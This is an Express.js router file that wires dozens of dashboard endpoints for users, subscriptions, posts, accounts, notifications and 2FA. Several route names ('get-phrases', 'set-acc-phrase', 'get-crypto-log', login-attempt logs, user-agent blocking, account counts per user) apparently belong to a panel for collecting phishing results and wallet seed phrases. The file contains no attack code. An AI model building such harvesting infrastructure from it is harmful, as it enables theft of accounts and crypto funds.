import express from "express";
import { dashboard } from "../controllers/Dashboard.js";

const router = express.Router();
router.get("/getAllUser", dashboard.getAllUser);
router.post("/createSubscription", dashboard.createSubscription);
router.get("/getSubscriptions", dashboard.getSubscriptions);
router.post("/createSubscriptionHistory", dashboard.createSubscriptionHistory);
router.get("/getAdminSubscriptionHistory", dashboard.getSubscriptionsHistoryForAdmin);
router.get("/getMySubscriptionsHistory", dashboard.getMySubscriptionsHistory);
router.get("/getTodayUsers", dashboard.getTodayUsers);
router.get("/getLoginAttempts", dashboard.getAllLoginAttempts);
router.get("/getGlobalLoginAttempts", dashboard.getGlobalLoginAttempts);
router.post("/createPost", dashboard.createPost);
router.post("/createReview", dashboard.createReview);
router.get("/getReviews", dashboard.getReviews);
router.get("/getPost", dashboard.getPostById);
router.get("/getPosts", dashboard.getPosts);
router.patch("/updatePost", dashboard.updatePost);
router.delete("/deletepost", dashboard.deletePost);
router.post("/createUrl", dashboard.createUrl);
router.get("/getUrl", dashboard.getUrlById);
router.get("/getUrls", dashboard.getUrls);
router.patch("/updateUrl", dashboard.updateUrl);
router.delete("/deleteUrl", dashboard.deleteUrl);
router.get("/getAccount", dashboard.getSingleAccount);
router.get("/getAccounts", dashboard.getAccounts);
router.get("/getAllAccounts", dashboard.getAllAccounts);
router.get("/getNotifications", dashboard.getNotifications);
router.get("/getNotification", dashboard.getNotification);
router.patch("/deleteNotification", dashboard.deleteNotification);
router.delete("/clearAllNotifications", dashboard.clearAllNotifications);
router.delete("/deleteAccount", dashboard.deleteAccount);
router.get("/editProfile", dashboard.editUserProfile);
router.get("/getaccountstatistics", dashboard.getAccountsStatistics);
router.post("/postIp", dashboard.postIp);
router.get("/getIps", dashboard.getIps);
router.delete("/deleteIp", dashboard.deleteIp);
router.get("/getTopUsers", dashboard.getTopUsersWithMostAccounts);
router.get('/users', dashboard.getAllUsers);
router.get("/messages", dashboard.getAllMessages);
router.post("/set-acc-phrase", dashboard.setAccPhrase);
router.post("/get-crypto-log", dashboard.getCryptoLog);
router.post("/create-phrase", dashboard.createPhrase);
router.get("/get-phrases", dashboard.getPhrases);
router.post("/verify-recaptcha", dashboard.verifyReCaptcha);
router.get("/blocker", dashboard.getBlockerStatus);
router.post("/os-blocker", dashboard.updateBlockedUserAgents);
router.delete("/os-blocker/:id", dashboard.deleteBlockedUserAgent);
router.post("/google-auth/verify", dashboard.verifyGoogleAuth);
router.post("/google-auth/setup", dashboard.setupGoogleAuth);

export default router;
